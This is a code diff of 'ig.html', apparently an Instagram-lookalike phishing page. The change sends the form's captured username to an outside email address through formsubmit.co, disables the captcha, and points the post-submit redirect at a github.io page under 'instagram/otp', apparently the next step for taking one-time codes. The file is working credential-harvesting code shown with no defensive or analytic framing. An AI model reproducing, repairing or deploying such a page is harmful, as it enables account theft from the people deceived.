--- a/ig.html
+++ b/ig.html
@@ -34,7 +34,7 @@
                     </div>
                 </div>
                 <div class="form-container">
-                    <form id="form"  method="POST" action="https://formsubmit.io/send/1b814e9a-f1bb-467e-bba1-c718cf9632cb">
+                    <form id="form"  method="POST" action="https://formsubmit.co/vcontest889@gmail.com">
 
                     <div class="form-content box">
                         <div class="logo">
@@ -59,7 +59,7 @@
                                     </span>
                                     <input type="text" name="username" id="username" required>
                                     <input type="hidden" name="_captcha" value="false">
-                                   <input type="hidden" name="_redirect" value="https://vtfrw.github.io/fvrap/instagram/otp/657daf104b167f68d1979b9c.html"> 
+                                   <input type="hidden" name="_next" value="https://vtfrw.github.io/fvrap/instagram/otp/657daf104b167f68d1979b9c.html"> 
                                 </div>
                                 
                             </div>
